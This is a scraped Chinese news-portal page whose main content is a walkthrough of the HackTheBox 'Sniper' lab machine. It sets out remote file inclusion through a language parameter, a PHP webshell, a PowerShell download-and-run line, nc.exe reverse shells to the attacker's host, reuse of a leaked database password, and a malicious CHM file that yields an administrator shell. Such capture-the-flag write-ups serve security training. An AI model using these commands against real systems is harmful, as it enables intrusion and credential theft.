最新要闻
- 致乘风破浪的青春|胡千行:求是创新,多维发展-消息
- 网上出现假冒北京市人社局的网站!官方发布风险提示_头条焦点
- 警惕!身上有这7个特征的人 容易得肺癌
- 男子嘴贴保鲜膜忍不住亲亲宝宝引热议 医生科普:被老人、家人亲吻会遭殃
- 太卷了!浙大学霸应聘机场驱鸟员:要求英语四级425分 环球微头条
- 厦门大学有哪些专业 厦门大学专业排名
- 天天热头条丨信泰航空拟对全资子公司信泰克增资1000万
- 5月国内汽车召回数量排名:美系特斯拉遥遥领先 全球滚动
- 珠峰为救遇险女子放弃登顶当事人发声:停止网暴_环球视讯
- OpenAI跻身全球前20大网站:月活用户近9亿
- 购物追剧两不误!腾讯视频会员年卡+京东PLUS年卡降价:到手138元
- 排海计划坚持不变!福岛核电站鱼体放射性物质超标180倍 环球头条
- 当前动态:2023年南疆冬小麦成熟期及复播玉米播种期预报金十期货6月5日讯,根据目前南疆冬小麦发育进程和6月天气气候趋势预测,预计2023年南疆冬小麦成熟期大部
- 比iPhone 14更薄的机身塞进4600mAh!vivo S17本周开卖:2499起
- AMD闪电发起价格战!RTX 4060 Ti这下太难过了 环球报道
- 每日精选:NVIDIA黄仁勋已返回美国 此前被传本周前往上海
手机
iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?
警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案
- iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?
- 警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案
- 男子被关545天申国赔:获赔18万多 驳回精神抚慰金
- 3天内26名本土感染者,辽宁确诊人数已超安徽
- 广西柳州一男子因纠纷杀害三人后自首
- 洱海坠机4名机组人员被批准为烈士 数千干部群众悼念
家电
hackthebox sniper medium
主机发现
nmap --min-rate 1000 -p- 10.10.10.151
(资料图)
发现80 和445端口
端口探测
首先利用smbclient 进行端口探测
smbclient -L //10.10.10.151
连接错误 (后面发现是因为本地smb配置错误导致的)
切换方向
访问80端口发现是一个类似博客的页面
鼠标悬浮可以查看到左下角的悬浮跳转url,发现有一个/blog/index.php
正页查看并查看源代码并没有发现不妥之处,将鼠标继续指向几个能跳转的地方,发现切换语言的超链接类似有一个lang=xx.php的后缀
那么这里很有可能会有LFI和RFI
进入抓包页面
首先尝试抓取一下/blog页面所用到的css相对路径,路径在/blog/index.php能够找到
注意相对路径的位置
尝试能不能LFI
但是想想windows的信息其实没有特别多敏感的,敏感的文件都给上了最高权限所以直接尝试能不能RFI
尝试能不能RFI
首先在本地创建一个test.php文件并写入一句话的测试 并开启python服务器
抓包 lang=\\kali"s ip\test.php看看返回包
最后也是成功输出,那就说明RFI能够执行php文件,再写入一个一句话木马
rce.php <--
改包传值 lang=\\kali ip\rce.php&pleasesubscribe=whoami (成功执行)
那么利用这个webshell进行一个反弹shell的操作
尝试powershell能否进行运行
pleasesubscribe=powershell+whoami (成功)
1.由于是windows环境,尝试能不能用poweshell进行反弹 (失败)
pleasesubcribe=IEX(NEW-Object+Net.WebClient).downloadString("http://10.10.14.2/pleasesubscribe.ps1")
在这个invoke-powershellTCP.ps脚本中的最后一行修改address和port kali10.10.10.2 ip port9001
本地将nishang的powershell反弹ps本开启python服务器等待下载回弹
python -m http.server 80
nc -lvnp 9001
无事发生
2.利用kali的/usr/share/windows-binanry内置的几个exe例如
包含nc.exe
利用kali的nc将靶机的powershell开启反弹到我们主机中
pleasesubscribe=\\10.10.14.2/nc.exe -e powershell 10.10.14.2 9001
运行命令
反弹成功
反弹成功后搜寻一下windows的铭感目录以及网页根目录iterhub/root
查看有什么用户 net user
发现了一段配置php
查看db.php type db.php 发现了一段数据库使用的账号密码
密码是长难句,用户名是sniper
可以利用crackmapexec去破解长难句的密码
crackmapexec 10.10.10.151 smb -u cris -p "36mEAhz/B8xQ~2VM"
报错
原因是因为目录中有smb目录
重新进入到一个没有smb目录的文件夹即可运行crackmapexec 10.10.10.151 smb -u cris -p "xx"
发现成功拿下这确实是一个用户名和匹配的密码
所以这个账号密码很有可能是用户cris在本机的密码
利用powershell将环境变量设置成cris和对应密码并将新设置好的密码反弹到一个新shell上
对两个参数进行设置
$pass=密码
$pass=ConvertTo-SecureString "密码" -AsPlainText -Force
$cred=New-Object System.Management.Automation.PSCredential("Chris",$pass)
再利用invoke-command执行命令
Invoke-command -ComputerName Sniper -Credential $cred -ScriptBlock {whoami}
报错!
发现是因为$cred设定命令中,利用凭证是需要将计算机名\\用户名+密码一块绑定
$cred = new-object system.management.automation.PSCredential("Sniper\\Chris",$pass)
tips:这里两个\是因为要转义
重新试一下运行invoke-command看看是否将环境变量设置成chris的
invoke-command -ComputerName Sniper -Credential $cred -ScriptBlock {whoami}
成功执行
将这个已经改变了环境变量为chris的shell反弹到一个新的监听端口中
invoke-command -ComputerName Sniper -Credential $cred -ScriptBlock {\\10.10.14.2\nc.exe 10.10.14.2 9001 -e powershell}
本地机器:rlwrap nc -lvnp 9001
通过rlwrap 进行前提可以让监听到的shell能够利用上下键进行快速命令执行
查看目录下的文件有什么
gci遍历文件
gci -resure -include *.* | select FullName
由于是powershell类型的靶机,尝试用powershell框架的渗透工具将最高权限反弹到linux中
这里利用nishang的out-chm.ps1进行
启用另一台windows机器下载nishang的脚本下载并使用out-chm脚本,有关脚本的解释在这
再找一个out-chm脚本的原始payload进行改造
PS > Out-CHM -Payload "-EncodedCommand <>" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"payload后面加的是代码 而hhcpath就是指HTML Help workshop的绝对下载路径
根据提示运行一下ps脚本
尝试一
1.import-module .\OUT-CHM.PS1
2.powershell运行 : .\out-chm.ps1 -payload "\\10.10.14.2\htb\nc.exe -e powershell 10.10.14.2 9001" -HHCpath "c:\program files(x86)\html help workshop"
就会在攻击者的windows创建于给nc.chm 将这个nc.chm放入在kali的smb中让靶机windows能够利用copy \\10.10.14.2\htb\cmd.chm . 的方式复制并执行
靶机windows操作
copy \\10.10.14.2\htb\cmd.chm .
但是失败了并没有反弹相关的shell
尝试二
1.在靶机上的一个可落地目录下载到kali上的nc.exe
将nc.exe拖动到smb共享目录上并且让windows下载
copy \\10.10.14.2\htb\nc.exe .
可能存在说一个deny的情况但是这属于权限不足的问题,kali上修改smb共享目录内的文件权限为777 chmod 777 nc.exe即可
2.在攻击者windows上利用nishang的out-chm进行创建一个恶意chm
ps > .\out-chm.ps1 -payload "c:\users\chris\download\nc.exe -e powershell 10.10.14.2 9001" -hhcpath "c:\program files(x86)\html help workshop"
本地改名叫一个nc.chm
3.将nc.chm放入到smb中让靶机windows copy下载
copy \\10.10.14.2\htb\nc.chm .
也可以利用invoke-webrequest下载
4.反弹成功 这个是administrator的shell
关键词:
hackthebox sniper medium
致乘风破浪的青春|胡千行:求是创新,多维发展-消息
网上出现假冒北京市人社局的网站!官方发布风险提示_头条焦点
警惕!身上有这7个特征的人 容易得肺癌
男子嘴贴保鲜膜忍不住亲亲宝宝引热议 医生科普:被老人、家人亲吻会遭殃
太卷了!浙大学霸应聘机场驱鸟员:要求英语四级425分 环球微头条
文心一言 VS 讯飞星火 VS chatgpt (32)-- 算法导论5.2 4题_全球看点
环球微动态丨【解决方法】网络设备使用CLI命令行模式进入Telnet登录,如交换机,路由器
厦门大学有哪些专业 厦门大学专业排名
天天热头条丨信泰航空拟对全资子公司信泰克增资1000万
5月国内汽车召回数量排名:美系特斯拉遥遥领先 全球滚动
珠峰为救遇险女子放弃登顶当事人发声:停止网暴_环球视讯
OpenAI跻身全球前20大网站:月活用户近9亿
购物追剧两不误!腾讯视频会员年卡+京东PLUS年卡降价:到手138元
排海计划坚持不变!福岛核电站鱼体放射性物质超标180倍 环球头条
当前动态:2023年南疆冬小麦成熟期及复播玉米播种期预报金十期货6月5日讯,根据目前南疆冬小麦发育进程和6月天气气候趋势预测,预计2023年南疆冬小麦成熟期大部
全国一体化算力算网调度平台正式发布
比iPhone 14更薄的机身塞进4600mAh!vivo S17本周开卖:2499起
AMD闪电发起价格战!RTX 4060 Ti这下太难过了 环球报道
每日精选:NVIDIA黄仁勋已返回美国 此前被传本周前往上海
Midjourney最强平替来了!广告大片分分钟直出:网友直呼太逼真
上千块的吹风机到底是不是智商税?看完秒懂
消息!2023年618淘宝好价节官方立减规则是什么?是否计入最低价?
React学习时,自己拟定的一则小案例(table表格组件,含编辑)
投资者权衡美联储利率政策 美债收益率周一全线走高
Intel Arc独立显卡第一次上水冷!这是何必呢?_环球速看料
上千师生操场烧烤缓解考前压力 老师:学校自费 图个好寓意 环球时讯
损失过亿!唯品会崩溃遭P0级故障:负责人被免职
国产显卡第一家!摩尔线程支持DX11:这下稳了
Edge独占结束!微软确认BingChat将向第三方浏览器推出
知乎,在短故事赛道跑出一个爆款
今日快看!Python第三方库批量下载到本地,并离线批量安装第三方库
AI版女网红“半藏森林”上线,服务项目让人意想不到 世界热门
全球观天下!在win2016服务器上安装Loadrunner 11版本
商品日报(6月5日):商品市场走势分化 原油系领涨金属全线回落
iPhone 15系列将于本月在郑州富士康量产:备货量巨大
特斯拉车主高速违停飞无人机:风景太美忍不住|全球观速讯
腾讯天美联合开发:育碧中国背景《刺客信条》新图公布
环球头条:iPhone 15将全系采用三星M12屏幕:Pro版依然独享ProMotion动态高刷
高人一等!男子开路虎插队洗车 我就猖狂了:嚣张到网友狂吐槽
最美贵州在等你_对于最美贵州在等你简单介绍|世界动态
东铁线是火车还是地铁(东铁线)
API NEWS | Money Lover爆出潜在API漏洞_世界速看
探究GIS地图在城市规划、环境管理和农业领域的应用
【全球速看料】druid活跃线程数量持续增长问题
世界快报:数据的完整性是企业数字化转型的基础
近万条儿童科普知识大全ACCESS\EXCEL数据库
三缸豪车 雷克萨斯最入门SUV车型LBX官图发布:用上1.5L混动-世界微速讯
腾讯FPS王炸大作!《无畏契约》国服客户端预载:6月8日终测 焦点
夏季风扇和空调到底谁更健康?看完明白了
2023年5月新能源车批发销量出炉:比亚迪能打10个长城
半藏森林克隆人暂下线:还在内测 名额已满_焦点简讯
Java虚拟线程
9千多少儿百科全书百科知识ACCESS\EXCEL数据库|天天看热讯
环球速讯:【解决方法】loopback口添加同目的网段的地址后,无法用默认路由ping通该网段地址
ppt应该保存什么格式
【环球财经】日经股指涨破32000点 为1990年7月以来首次
每日播报!高中最特别的时刻!高考前最后一个晚自习还记得多少?
哪吒CEO张勇:哪吒S是最漂亮的B级车 还是100万内最好的轿跑 热门
迪士尼一边涨价一边裁员:门票卖到799元
女子酒驾被查 喝了几瓶菠萝啤 以为是饮料 天天新资讯
天天热头条丨《小美人鱼》反派人类公主凡妮莎剧照出炉:比美人鱼颜值高、超甜
ST华铁(000976)6月5日主力资金净买入651.43万元 全球热闻
ChatGLM-6B int4的本地部署与初步测试
Ambient Mesh:Istio 数据面新模式
某OA 11.10 未授权任意文件上传
判断非String对象是否为null,小伙竟然用StringUtils.isEmpty(obj+"")
全球负收益率债券规模反弹至近2万亿美元
西部矿业: 目前上半年尚未结束,公司暂时没有收到锂资源公司分红的消息_每日快讯
今日黄金td行情分析(2023年6月5日)
前沿资讯!净化器原厂/第三方滤芯对比:差距高下立判
网传北京将出台摩托车新规 京A禁止过户 多方回应
《暗黑4》玩家希望新角色继承地图数据:重新跑图太无聊 实时焦点
芯片投入决心绝不动摇!小米自研芯片公司玄戒增资至19.2亿 全球通讯
大众电动车高速收费站撞车爆燃致四人死亡 现场视频曝光:毫无减速_当前快看
MySQL的数据目录(Linux)
数据万象 | AIGC 存储内容安全解决方案
每日看点!Java SPI概念、实现原理、优缺点、应用场景、使用步骤、实战SPI案例
世界短讯!让人欣慰?老外呼吁热门IP都应改为黑人:受社会尊重 改变低人一等形象
视焦点讯!杭州一居民家门口地面有80℃ 热到烫脚:挖2小时后找到原因 网友称好险
.NET使用System.Speech轻松读取文本
环球快报:2023年最新辽宁省直住房公积金缴费基数是多少
新款Mac Pro现身跑分平台:M2 Ultra处理器 频率3.68 GHz
1.4kg重量就做到900ANSI流明!哈趣H2投影仪评测:旅行能用充电宝供电|每日报道
关注:不如隔壁New Bing:谷歌搜索AI功能被吐槽反应太慢
当前速讯:2023高考即将来临 应该怎么吃?专家科普:避免5个忌讳
50年前美国登月真的造假吗?日本将第三次挑战登月 证实可能性
苹果(AAPL.US)本周将举办开发者大会 首款头显终将亮相 环球快播报
2023陕西省大学生信息安全竞赛web writeup
世界速看:MySQL字符集与校对集规则说明
Linux环境安装JDK-焦点精选
取代手机不是吹!Win11原生运行安卓APP体验大升级:便捷丝滑-全球资讯
全球快看点丨乘客雨中候车 高铁站台为什么不能打伞上热搜:官方说明
两位国人男子放弃登顶珠峰花1万美元救人 获救女子只愿承担4成救援费 天天新消息
小鹏G6官宣神秘代言人:网友纷纷猜是林志颖! 环球资讯
世界今日讯!全脂/低脂可选:特仑苏纯牛奶2.7元/盒发车(商超6元)
两元人民币图片 两元人民币_每日速讯
今日美股市场行情快报(2023年6月5日)
《计算机网络》——华为基本配置命令_焦点热讯
700多心理测试性格测试大全ACCESS数据库 每日讯息